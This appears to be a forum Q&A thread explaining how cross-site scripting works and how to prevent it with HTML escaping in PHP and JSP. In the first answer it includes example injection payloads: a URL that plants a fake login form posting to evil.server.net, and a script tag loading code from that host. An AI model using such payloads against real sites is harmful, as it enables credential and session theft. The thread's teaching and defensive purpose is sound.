What is the general concept behind XSS?
i dont get how JS/VBscript can cause so much damage!
Ok. suppose you have a site, and the site is served from http://trusted.server.com/thesite
. Let's say this site has a search box, and when you search the url becomes: http://trusted.server.com/thesite?query=somesearchstring
.
If the site decides to not process the search string and outputs it in the result, like "You search "somesearchstring" didn't yield any results, then anybody can inject arbitrary html into the site. For example:
http://trusted.server.com/thesite?query=<form action="http://evil.server.net">username: <input name="username"/><br/>password: <input name="pw" type="password"/><br/><input type="sumbit"/></form>
So, in this case, the site will dutifully show a fake login form on the search results page, and if the user submits it, it will send the data to the evil untrusted server. But the user doesn't see that, esp. if the url is really long they will just see the first but, and assume they are dealing with trusted.server.com.
Variations to this include injecting a <script>
tag that adds event handlers to the document to track the user's actions, or send the document cookie to the evil server. This way you can hope to bump into sensitive data like login, password, or credit card data. Or you can try to insert a specially styled <iframe>
that occupies the entire client window and serves a site that looks like the original but actually originates from evil.server.com. As long as the user is tricked into using the injected content instead of the original, the security's comprompised.
This type of XSS is called reflective and non-persistent. Reflective because the url is "relected" directly in the response, and non-persistent because the actual site is not changed - it just serves as a pass through. Note that something like https offers no protection whatsoever here - the site itself is broken, because it parrots the user input via the query string.
The trick is now to get unsuspecting users to trust any links you give them. For example, you can send them a HTML email and include an attractive looking link which points to the forged url. Or you can perhaps spread it on wikis, forums etc. I am sure you can appreciate how easy it really is - it's just a link, what could go wrong, right?
Sometimes it can be worse. Some sites actually store user-supplied content. Simple example: comments on a blog or threads on a forum. Or it may be more subtle: a user profile page on a social network. If those pages allow arbitrary html, esp. script, and this user-supplied html is stored and reproduced, then everybody that simply visits the page that contains this content is at risk. This is persistent XSS. Now users don't even need to click a link anymore, just visiting is enough. Again the actual attack consists of modifying the page through script in order to capture user data.
Script injection can be blunt, for example, one can insert a complete <script src="http://evil.server.net/script.js">
or it may be subtle: <img src="broken" onerror="...quite elaborate script to dynamically add a script tag..."/>
.
As for how to protect yourself: the key is to never output user input. This may be difficult if your site revolves around user-supplied content with markup.
Straight forward XSS
- I find Google has an XSS vulnerability.
- I write a script that rewrites a public Google page to look exactly like the actual Google login.
- My fake page submits to a third party server, and then redirects back to the real page.
- I get google account passwords, users don't realize what happened, Google doesn't know what happened.
XSS as a platform for CSRF (this supposedly actually happened)
- Amazon has a CSRF vulnerability where a "always keep me logged in" cookie allows you to flag an entry as offensive.
- I find an XSS vulnerability on a high traffic site.
- I write a JavaScript that hits up the URLs to mark all books written by gay/lesbian authors on Amazon as offensive.
- To Amazon, they are getting valid requests from real browsers with real auth cookies. All the books disappear off the site overnight.
- The internet freaks the hell out.
XSS as a platform for Session Fixation attacks
- I find an e-commerce site that does not reset their session after a login (like any ASP.NET site), have the ability to pass session id in via query string or via cookie, and stores auth info in the session (pretty common).
- I find an XSS vulnerability on a page on that site.
- I write a script that sets the session ID to the one I control.
- Someone hits that page, and is bumped into my session.
- They log in.
- I now have the ability to do anything I want as them, including buying products with saved cards.
Those three are the big ones. The problem with XSS, CSRF, and Session Fixation attacks are that they are very, very hard to track down and fix, and are really simple to allow, especially if a developer doesn't know much about them.
As the answers on how XSS can be malicious are already given, I'll only answer the following question left unanswered:
how can i prevent XSS from happening on my websites ?
As to preventing from XSS, you need to HTML-escape any user-controlled input when they're about to be redisplayed on the page. This includes request headers, request parameters and any stored user-controlled input which is to be served from a database. Especially the <
, >
, "
and '
needs to be escaped, because it can malform the surrounding HTML code where this input is been redisplayed.
Almost any view technolgy provides builtin ways to escape HTML (or XML, that's also sufficient) entities.
In PHP you can do that with htmlspecialchars()
. E.g.
<input name="foo" value="<?php echo htmlspecialchars($foo); ?>">
If you need to escape singlequotes with this as well, you'll need to supply the ENT_QUOTES
argument, also see the aforelinked PHP documentation.
In JSP you can do that with JSTL <c:out>
or fn:escapeXml()
. E.g.
<input name="foo" value="<c:out value="${param.foo}" />">
or
<input name="foo" value="${fn:escapeXml(param.foo)}">
Note that you actually don't need to escape XSS during request processing, but only during response processing. Escaping during request processing is not needed and it may malform the user input sooner or later (and as being a site admin you'd also like to know what the user in question has actually entered so that you can take social actions if necessary). With regard to SQL injections, just only escape it during request processing at the moment when the data is about to be persisted in the database.